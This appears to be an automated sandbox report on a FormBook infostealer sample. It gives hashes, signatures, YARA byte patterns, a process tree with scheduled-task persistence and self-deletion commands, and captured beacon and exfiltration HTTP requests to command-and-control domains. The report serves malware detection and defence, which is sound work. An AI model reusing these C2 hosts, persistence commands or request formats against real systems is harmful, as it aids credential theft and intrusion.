# Analysis Report CN03716-20.exe

## Overview

### General Information

- Sample Name: CN03716-20.exe
- Analysis ID: 288109
- MD5: b29ab9daeda57a7b9494bf50e37b556c
- SHA1: c97d6f7ebda204b6411a00e8fb3b4fd80e62cc33
- SHA256: 9cd82d6a35b48112a4e99f0cbdbd3a18df7738082d7f40f24274debfc5688ec4
- Tags: exe, FormBook

### Detection

- Detection: FormBook
- Score: 100
- Range: 0 - 100
- Whitelisted: false
- Confidence: 100%

### Signatures

- Antivirus / Scanner detection for submitted sample
- Antivirus detection for URL or domain
- Antivirus detection for dropped file
- Benign windows process drops PE files
- Detected FormBook malware
- Malicious sample detected (through community Yara rule)
- Multi AV Scanner detection for dropped file
- Multi AV Scanner detection for submitted file
- Sigma detected: Scheduled temp file as task from temp location
- System process connects to network (likely due to code injection or exploit)
- Yara detected AntiVM_3
- Yara detected FormBook
- .NET source code contains potential unpacker
- Injects a PE file into a foreign processes
- Machine Learning detection for dropped file
- Machine Learning detection for sample
- Maps a DLL or memory area into another process
- Modifies the prolog of user mode functions (user mode inline hooks)
- Queues an APC in another process (thread injection)
- Sample uses process hollowing technique
- Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
- Tries to detect virtualization through RDTSC time measurements
- Tries to harvest and steal browser information (history, passwords, etc)
- Tries to steal Mail credentials (via file access)
- Antivirus or Machine Learning detection for unpacked file
- Checks if the current process is being debugged
- Contains capabilities to detect virtual machines
- Contains functionality for execution timing, often used to detect debuggers
- Contains functionality to call native functions
- Contains functionality to read the PEB
- Contains long sleeps (>= 3 min)
- Creates a DirectInput object (often for capturing keystrokes)
- Creates a process in suspended mode (likely to inject code)
- Detected potential crypto function
- Drops PE files
- Enables debug privileges
- Found potential string decryption / allocating functions
- HTTP GET or POST without a user agent
- IP address seen in connection with other malware
- Internet Provider seen in connection with other malware
- May sleep (evasive loops) to hinder dynamic analysis
- Queries the volume information (name, serial number etc) of a device
- Sample execution stops while process was sleeping (likely an evasion)
- Sample file is different than original file name gathered from version info
- Uses a Windows Living Off The Land Binaries (LOL bins)
- Uses a known web browser user agent for HTTP communication
- Uses code obfuscation techniques (call, push, ret)
- Yara signature match

### Classification

### Startup

System: w10x64

- CN03716-20.exe (PID: 5260, cmdline: 'C:\Users\user\Desktop\CN03716-20.exe', MD5: B29AB9DAEDA57A7B9494BF50E37B556C)
- schtasks.exe (PID: 5172, cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\QZblaErkmXlkhK' /XML 'C:\Users\user\AppData\Local\Temp\tmpA242.tmp', MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 5512, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- CN03716-20.exe (PID: 4356, cmdline: C:\Users\user\Desktop\CN03716-20.exe, MD5: B29AB9DAEDA57A7B9494BF50E37B556C)
- explorer.exe (PID: 3368, MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- control.exe (PID: 6584, cmdline: C:\Windows\SysWOW64\control.exe, MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
- cmd.exe (PID: 6872, cmdline: /c del 'C:\Users\user\Desktop\CN03716-20.exe', MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 6884, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- srmdufw81bmhwhwh.exe (PID: 4956, cmdline: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe, MD5: B29AB9DAEDA57A7B9494BF50E37B556C)
- schtasks.exe (PID: 6372, cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\QZblaErkmXlkhK' /XML 'C:\Users\user\AppData\Local\Temp\tmp2A88.tmp', MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 6352, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- srmdufw81bmhwhwh.exe (PID: 6420, cmdline: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe, MD5: B29AB9DAEDA57A7B9494BF50E37B556C)
- srmdufw81bmhwhwh.exe (PID: 6408, cmdline: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe, MD5: B29AB9DAEDA57A7B9494BF50E37B556C)
- cmstp.exe (PID: 1548, cmdline: C:\Windows\SysWOW64\cmstp.exe, MD5: 4833E65ED211C7F118D4A11E6FB58A09)
- cleanup

## Malware Configuration

No configs have been found
## Yara Overview

### Memory Dumps

- Source: `0000001A.00000002.504807087.00000000033F9000.00000004.00000001.sdmp`, Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Author: Joe Security
- Source: `00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp`, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
- Source: `00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp`, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com. Strings:
  - `0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC`
  - `0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC`
  - `0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94`
  - `0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91`
  - `0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F`
  - `0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07`
  - `0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06`
  - `0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8`
  - `0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D`
  - `0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4`
  - `0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00`
- Source: `00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp`, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group. Strings:
  - `0x18349:$sqlite3step: 68 34 1C 7B E1`
  - `0x1845c:$sqlite3step: 68 34 1C 7B E1`
  - `0x18378:$sqlite3text: 68 38 2A 90 C5`
  - `0x1849d:$sqlite3text: 68 38 2A 90 C5`
  - `0x1838b:$sqlite3blob: 68 53 D8 7F 8C`
  - `0x184b3:$sqlite3blob: 68 53 D8 7F 8C`
- Source: `00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp`, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security

### Unpacked PEs

- Source: `30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack`, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
- Source: `30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack`, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com. Strings:
  - `0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC`
  - `0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC`
  - `0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94`
  - `0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91`
  - `0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F`
  - `0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07`
  - `0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06`
  - `0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8`
  - `0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D`
  - `0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4`
  - `0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00`
- Source: `30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack`, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group. Strings:
  - `0x18349:$sqlite3step: 68 34 1C 7B E1`
  - `0x1845c:$sqlite3step: 68 34 1C 7B E1`
  - `0x18378:$sqlite3text: 68 38 2A 90 C5`
  - `0x1849d:$sqlite3text: 68 38 2A 90 C5`
  - `0x1838b:$sqlite3blob: 68 53 D8 7F 8C`
  - `0x184b3:$sqlite3blob: 68 53 D8 7F 8C`
- Source: `30.2.srmdufw81bmhwhwh.exe.400000.0.unpack`, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
- Source: `30.2.srmdufw81bmhwhwh.exe.400000.0.unpack`, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com. Strings:
  - `0x8ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC`
  - `0x8d42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC`
  - `0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94`
  - `0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91`
  - `0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F`
  - `0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07`
  - `0x975a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06`
  - `0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8`
  - `0xa453:$sequence_7: 66 89 0C 02 5B 8B E5 5D`
  - `0x1a467:$sequence_8: 3C 54 74 04 3C 74 75 F4`
  - `0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00`

## Sigma Overview

### System Summary:

Sigma detected: Scheduled temp file as task from temp location

## Signature Overview

### AV Detection:

Antivirus / Scanner detection for submitted sample
- Source: CN03716-20.exe Avira: detected
Antivirus detection for URL or domain
- Source: http://www.esanjor.online/cmg/?M694-=yVIXBz1P&BB=CmTltWFTvy3EJlg4TEqBBLn9+8OjC9fpBSds7xERVBMYuIjPQpcJ/EVqARb7a9JaL//732yiKA== Avira URL Cloud: Label: malware
Antivirus detection for dropped file
- Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exe Avira: detection malicious, Label: TR/AD.Swotter.iznqo
- Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Avira: detection malicious, Label: TR/AD.Swotter.iznqo
- Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Avira: detection malicious, Label: TR/AD.Swotter.iznqo
Multi AV Scanner detection for dropped file
- Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Virustotal: Detection: 27%
- Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Metadefender: Detection: 13%
- Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe ReversingLabs: Detection: 31%
- Source: C:\Users\user\AppData\Local\Temp\Iw6qlizi\srmdufw81bmhwhwh.exe Virustotal: Detection: 27%
- Source: C:\Users\user\AppData\Local\Temp\Iw6qlizi\srmdufw81bmhwhwh.exe Metadefender: Detection: 13%
- Source: C:\Users\user\AppData\Local\Temp\Iw6qlizi\srmdufw81bmhwhwh.exe ReversingLabs: Detection: 31%
- Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exe Virustotal: Detection: 27%
- Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exe Metadefender: Detection: 13%
- Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exe ReversingLabs: Detection: 31%
Multi AV Scanner detection for submitted file
- Source: CN03716-20.exe Virustotal: Detection: 27%
- Source: CN03716-20.exe Metadefender: Detection: 13%
- Source: CN03716-20.exe ReversingLabs: Detection: 31%
Yara detected FormBook
- Source: Yara match File source: 00000007.00000002.338985668.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000007.00000002.339676202.00000000011A0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000010.00000002.524514426.0000000004290000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000007.00000002.340698875.0000000001920000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000001E.00000002.514282839.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000001A.00000002.505322558.0000000004399000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000010.00000002.524572996.00000000042C0000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000001E.00000002.512975825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000001E.00000002.515119349.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000010.00000002.519397302.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000001F.00000002.516896935.0000000002800000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000000.00000002.290869123.0000000003EA9000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 30.2.srmdufw81bmhwhwh.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match File source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match File source: 7.2.CN03716-20.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match File source: 7.2.CN03716-20.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
- Source: C:\Users\user\AppData\Roaming\QZblaErkmXlkhK.exe Joe Sandbox ML: detected
- Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Joe Sandbox ML: detected
- Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Joe Sandbox ML: detected
Machine Learning detection for sample
- Source: CN03716-20.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
- Source: 30.2.srmdufw81bmhwhwh.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 7.2.CN03716-20.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
HTTP GET or POST without a user agent
- Source: global traffic HTTP traffic detected: GET /cmg/?M694-=yVIXBz1P&BB=CmTltWFTvy3EJlg4TEqBBLn9+8OjC9fpBSds7xERVBMYuIjPQpcJ/EVqARb7a9JaL//732yiKA== HTTP/1.1Host: www.esanjor.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
- Source: global traffic HTTP traffic detected: GET /cmg/?BB=5/1mjjR4mGjOAvq4NnaV6etpsB6KL9PtiQNF/4xJREY1Y/y+fGAvCK0i83oyWJ1COzWQaYhpTQ==&M694-=yVIXBz1P HTTP/1.1Host: www.lifecoachwoman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
- Source: Joe Sandbox View IP Address: 35.242.251.130
- Source: Joe Sandbox View IP Address: 35.242.251.130
- Source: Joe Sandbox View IP Address: 52.0.217.44
Internet Provider seen in connection with other malware
- Source: Joe Sandbox View ASN Name: GOOGLEUS
- Source: Joe Sandbox View ASN Name: AMAZON-AESUS
Uses a known web browser user agent for HTTP communication
- Source: global traffic HTTP traffic detected: POST /cmg/ HTTP/1.1Host: www.lifecoachwoman.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.lifecoachwoman.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lifecoachwoman.com/cmg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 42 3d 78 64 35 63 39 48 78 33 34 30 50 78 5a 66 71 32 62 67 48 4a 76 5a 77 48 37 7a 4b 4e 63 4f 6a 47 6d 33 6b 67 38 72 64 5f 63 78 73 57 58 73 6d 79 64 6d 39 47 45 61 67 68 38 55 34 4b 51 61 59 52 45 44 69 64 61 35 46 41 61 6f 38 65 75 43 51 5a 4c 44 72 52 39 41 62 59 6e 67 36 50 38 54 58 34 43 71 4b 74 52 72 47 5a 63 64 38 30 41 7a 74 62 70 49 42 62 6c 71 57 49 50 47 48 4f 56 43 36 57 4a 56 50 5f 53 37 31 43 65 64 71 63 48 5f 6a 34 64 39 68 79 45 63 56 44 55 64 52 64 41 2d 70 70 6d 73 77 6a 74 4c 52 65 58 5f 6f 74 42 78 4c 79 71 4f 77 75 56 74 38 58 37 74 33 4a 6a 4c 7e 4a 61 55 43 46 74 65 69 46 34 71 28 5f 6b 77 46 56 6d 49 4a 57 39 36 7a 35 57 48 4e 53 53 54 6a 48 55 55 36 47 6d 39 66 63 4d 65 32 71 52 4d 70 73 4c 71 59 54 61 4a 37 64 71 50 30 59 4b 36 42 78 6b 67 75 66 43 73 46 4c 74 32 73 58 28 77 32 4a 4f 67 53 6e 77 34 72 53 66 51 75 65 31 35 35 38 64 49 46 48 67 4c 32 67 6f 67 41 4b 58 50 4c 66 6a 70 78 50 37 31 6b 4f 75 6c 6c 71 49 38 35 67 45 61 45 6a 39 62 72 34 36 66 6e 70 4a 4e 4b 70 28 36 58 53 7e 4f 6a 4d 4f 46 54 5f 46 2d 6e 65 35 4a 70 44 78 45 43 39 39 68 6b 4b 41 6e 56 45 50 37 6c 68 78 5a 51 59 50 56 39 54 46 77 56 38 32 43 6e 37 36 5a 39 39 63 68 6a 54 57 75 42 74 65 6f 51 73 73 54 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: BB=xd5c9Hx340PxZfq2bgHJvZwH7zKNcOjGm3kg8rd_cxsWXsmydm9GEagh8U4KQaYREDida5FAao8euCQZLDrR9AbYng6P8TX4CqKtRrGZcd80AztbpIBblqWIPGHOVC6WJVP_S71CedqcH_j4d9hyEcVDUdRdA-ppmswjtLReX_otBxLyqOwuVt8X7t3JjL~JaUCFteiF4q(_kwFVmIJW96z5WHNSSTjHUU6Gm9fcMe2qRMpsLqYTaJ7dqP0YK6BxkgufCsFLt2sX(w2JOgSnw4rSfQue1558dIFHgL2gogAKXPLfjpxP71kOullqI85gEaEj9br46fnpJNKp(6XS~OjMOFT_F-ne5JpDxEC99hkKAnVEP7lhxZQYPV9TFwV82Cn76Z99chjTWuBteoQssTo.
- Source: global traffic HTTP traffic detected: POST /cmg/ HTTP/1.1Host: www.lifecoachwoman.comConnection: closeContent-Length: 165896Cache-Control: no-cacheOrigin: http://www.lifecoachwoman.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lifecoachwoman.com/cmg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 42 3d 78 64 35 63 39 44 74 6b 36 6b 4c 67 64 74 4f 31 61 77 58 52 6c 35 42 49 71 45 53 67 4d 70 58 30 34 30 67 77 38 72 42 7a 51 55 77 45 64 73 57 79 66 6b 46 42 51 4b 67 67 6f 6b 34 4a 55 61 56 6f 59 69 47 6a 61 34 52 6d 61 6f 45 5a 67 6b 30 63 49 54 72 47 38 67 58 53 68 67 65 59 38 57 66 6e 43 4f 75 31 55 72 4b 5a 54 4a 70 79 4d 79 39 4d 75 4a 4e 49 6d 61 62 41 63 79 61 65 56 79 57 45 49 33 7a 6e 62 61 70 41 63 65 32 54 62 4b 72 41 58 4e 5a 70 4b 73 41 4c 59 2d 74 43 46 64 63 42 79 4a 52 44 69 70 70 64 49 66 77 6a 47 32 33 4d 76 5f 45 58 46 74 74 75 37 71 72 34 75 64 47 55 65 55 75 4e 76 76 66 51 7a 37 37 35 68 7a 63 49 73 75 39 6e 37 36 44 47 4a 54 41 41 42 54 4f 48 41 33 54 4e 35 50 76 33 4f 76 36 6d 61 64 31 55 4b 64 34 62 57 70 4b 50 67 73 56 41 45 4f 78 35 77 44 43 74 61 73 46 67 67 57 74 46 6e 79 65 78 65 54 7e 38 6e 74 6a 37 55 7a 4f 4f 74 49 45 69 61 4e 5a 78 39 35 4c 47 71 52 67 65 64 72 6e 6e 6e 4b 39 2d 38 43 55 69 77 31 6c 4e 49 34 41 75 45 61 46 53 39 61 71 58 37 72 50 70 4b 38 72 7a 72 34 28 67 70 65 6a 52 4d 56 44 35 50 70 48 77 35 49 4e 44 6a 68 7e 58 76 6e 6b 4b 58 45 39 48 4f 65 52 68 79 70 51 59 44 31 38 79 4e 53 64 7a 37 32 72 64 7a 37 56 66 62 53 66 38 64 75 5a 41 61 36 70 73 36 55 76 34 6e 36 33 78 28 2d 49 34 64 4e 71 66 6b 37 56 6e 38 49 57 46 4a 30 34 71 45 41 33 73 39 64 69 78 65 39 35 6e 7a 6b 57 55 30 5a 39 59 7a 31 4c 45 55 34 69 72 57 34 79 65 42 6c 68 7a 4a 36 76 69 4c 36 44 37 67 71 73 53 47 67 71 6a 46 30 4e 71 73 54 75 30 43 43 6f 49 4a 4b 43 47 35 64 74 65 48 49 4a 33 61 75 33 30 6c 77 57 34 4d 53 61 35 43 32 43 43 6e 45 49 32 43 53 4e 34 34 6b 46 65 77 65 32 4e 54 47 56 73 48 65 7e 63 6f 4a 6e 4e 50 38 52 64 68 51 48 48 54 78 72 6b 48 76 61 61 79 64 6f 35 4e 41 76 2d 35 51 44 4e 48 33 34 59 36 61 32 56 69 43 57 4e 4e 42 6d 73 73 4f 66 35 55 5f 50 39 58 41 4b 54 53 39 61 50 76 36 43 42 64 44 6d 62 4e 66 4c 77 67 6d 71 44 4b 41 4f 65 36 6c 49 35 6c 41 46 67 72 6f 55 64 41 38 71 39 76 51 6d 45 63 46 4c 79 4a 71 58 6c 7e 4a 52 34 52 53 51 72 47 66 67 32 48 4b 75 4d 39 73 7a 66 6e 5f 75 33 58 5a 4f 50 74 43 6e 4d 59 33 30 54 55 34 4b 50 4c 6b 59 64 6e 59 72 44 4f 4f 4e 7a 46 59 32 35 51 41 73 45 6b 52 6a 75 54 55 4f 54 43 2d 44 41 77 61 70 43 6f 46 30 50 48 37 39 6f 4d 43 77 73 58 39 4c 5f 66 70 59 37 31 72 4e 6e 79 74 46 61 57 73 74 4c 55 4f 28 52 4e 36 7a 62 4a 63 43 4e 54 41 6a 47 46 52 42 42 57 56 38 53 65 36 58 66 4d 6e 4a 4e 4d 53 65 5a 71 41 62 62 4c 30 43 66 65 6d 4c 46 6e 6c 6b 4e 76 67 50 31 35 70 4c 44 48 39 72 6a 42 67 51 52 67 62 64 67 57 47 28 61 51 33 4a 48 34 43 50 39 51 52 34 71 30 7
- Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Sep 2020 14:47:30 GMTConnection: closeContent-Length: 485Content-Encoding: gzipX-Frame-Options: SAMEORIGINCache-Control: private, no-cache, no-store, max-age=0Expires: Mon, 01 Jan 1990 0:00:00 GMTData Raw: 1f 8b 08 00 00 00 00 00 00 00 95 52 d1 6e d3 30 14 7d ef 57 78 46 e2 85 3a 4e 69 d1 46 9b 04 89 76 12 93 06 9b 46 10 e2 09 39 c9 4d e2 cd b1 83 7d 9b ac 7f 8f 93 54 5b b5 3d 20 9e ac 7b ee 39 c7 be c7 37 3a db dd 6c d3 5f b7 97 e4 4b fa f5 9a dc fe f8 7c 7d b5 25 94 71 fe 73 b9 e5 7c 97 ee a6 c6 2a 08 17 24 b5 42 3b 89 d2 68 a1 38 bf fc 46 09 ad 11 db 35 e7 7d df 07 fd 32 30 b6 e2 e9 1d af b1 51 2b ae 8c 71 10 14 58 d0 64 16 0d 10 79 6c 94 76 eb 32 8b 4f 65 a5 c8 21 33 e6 21 c8 4d c3 df 87 e1 05 2f b3 46 d1 23 d9 54 4f 64 53 b5 41 03 5c bb 37 a3 21 88 c2 1f 0d a0 20 03 81 c1 9f bd ec 62 ba 35 1a 41 23 4b 0f 2d 50 92 4f 55 4c 11 1e 71 7c d7 86 e4 b5 b0 0e 30 de 63 c9 2e 68 32 59 68 d1 40 4c 3b 09 7d 6b 2c 9e 08 7b 59 60 1d 17 d0 c9 1c d8 58 cc 89 d4 3e 04 a1 98 cb 85 82 78 31 27 7b 07 76 ac 44 e6 01 6d 88 ab ad d4 0f 0c 0d 2b 25 7a c0 5f 83 12 15 24 6f 75 e6 da 4d c4 a7 2a 52 9e 45 6a 0b e5 d3 94 32 c8 0b dd 0a 3b e5 81 35 34 e0 b8 85 4a 3a b4 c2 f2 f3 8f 8b 45 f8 21 c8 9d a3 c4 82 8a a9 c3 83 02 57 03 20 7d 65 e7 bc 5f e9 07 71 41 65 4c a5 40 b4 d2 8d b6 5e fe a9 14 8d 54 87 f8 a6 05 fd ee bb ff d7 f5 2a 0c e7 e7 61 f8 da 97 a0 cf f2 18 e1 70 71 12 f1 63 fa 99 29 0e 49 e4 72 2b 5b 3c 65 dd 8b 4e 4c a8 27 9f 31 36 eb 84 25 f9 90 31 89 09 9d 66 a0 9b 01 94 85 4f 59 96 12 ec d0 a1 9b 19 63 de 7e d2 fe c3 99 38 9b c7 f4 65 62 cf 51 75 4b bf 82 a2 00 1b dc 8f 6f fe 1f d3 ba fd 3d 01 2f b4 7c 9a 78 dc a4 64 f6 17 4c d4 8a 78 3d 03 00 00 Data Ascii: Rn0}WxF:NiFvF9M}T[= {97:l_K|}%qs|*\$B;h8F5}20Q+qXdylv2Oe!3!M/F#TOdSA\7! b5A#K-POULq|0c.h2Yh@L;}k,{Y`X>x1'{vDm+%z_\$ouM*REj2;54J:E!W }e_qAeL@^T*apqc)Ir+[x1'{vDm+%z_\$ouM*REj2;54J:E!W }e_qAeL@^T*apqc)Ir+[
- Source: global traffic HTTP traffic detected: GET /cmg/?M694-=yVIXBz1P&BB=CmTltWFTvy3EJlg4TEqBBLn9+8OjC9fpBSds7xERVBMYuIjPQpcJ/EVqARb7a9JaL//732yiKA== HTTP/1.1Host: www.esanjor.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
- Source: global traffic HTTP traffic detected: GET /cmg/?BB=5/1mjjR4mGjOAvq4NnaV6etpsB6KL9PtiQNF/4xJREY1Y/y+fGAvCK0i83oyWJ1COzWQaYhpTQ==&M694-=yVIXBz1P HTTP/1.1Host: www.lifecoachwoman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Found strings which match to known social media urls
- Source: control.exe, 00000010.00000002.529660128.0000000004E9F000.00000004.00000001.sdmp String found in binary or memory: equals www.facebook.com (Facebook)
Performs DNS lookups
- Source: unknown DNS traffic detected: queries for: cdn.onenote.net
Posts data to webserver
- Source: unknown HTTP traffic detected: POST /cmg/ HTTP/1.1Host: www.lifecoachwoman.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.lifecoachwoman.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lifecoachwoman.com/cmg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 42 3d 78 64 35 63 39 48 78 33 34 30 50 78 5a 66 71 32 62 67 48 4a 76 5a 77 48 37 7a 4b 4e 63 4f 6a 47 6d 33 6b 67 38 72 64 5f 63 78 73 57 58 73 6d 79 64 6d 39 47 45 61 67 68 38 55 34 4b 51 61 59 52 45 44 69 64 61 35 46 41 61 6f 38 65 75 43 51 5a 4c 44 72 52 39 41 62 59 6e 67 36 50 38 54 58 34 43 71 4b 74 52 72 47 5a 63 64 38 30 41 7a 74 62 70 49 42 62 6c 71 57 49 50 47 48 4f 56 43 36 57 4a 56 50 5f 53 37 31 43 65 64 71 63 48 5f 6a 34 64 39 68 79 45 63 56 44 55 64 52 64 41 2d 70 70 6d 73 77 6a 74 4c 52 65 58 5f 6f 74 42 78 4c 79 71 4f 77 75 56 74 38 58 37 74 33 4a 6a 4c 7e 4a 61 55 43 46 74 65 69 46 34 71 28 5f 6b 77 46 56 6d 49 4a 57 39 36 7a 35 57 48 4e 53 53 54 6a 48 55 55 36 47 6d 39 66 63 4d 65 32 71 52 4d 70 73 4c 71 59 54 61 4a 37 64 71 50 30 59 4b 36 42 78 6b 67 75 66 43 73 46 4c 74 32 73 58 28 77 32 4a 4f 67 53 6e 77 34 72 53 66 51 75 65 31 35 35 38 64 49 46 48 67 4c 32 67 6f 67 41 4b 58 50 4c 66 6a 70 78 50 37 31 6b 4f 75 6c 6c 71 49 38 35 67 45 61 45 6a 39 62 72 34 36 66 6e 70 4a 4e 4b 70 28 36 58 53 7e 4f 6a 4d 4f 46 54 5f 46 2d 6e 65 35 4a 70 44 78 45 43 39 39 68 6b 4b 41 6e 56 45 50 37 6c 68 78 5a 51 59 50 56 39 54 46 77 56 38 32 43 6e 37 36 5a 39 39 63 68 6a 54 57 75 42 74 65 6f 51 73 73 54 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: 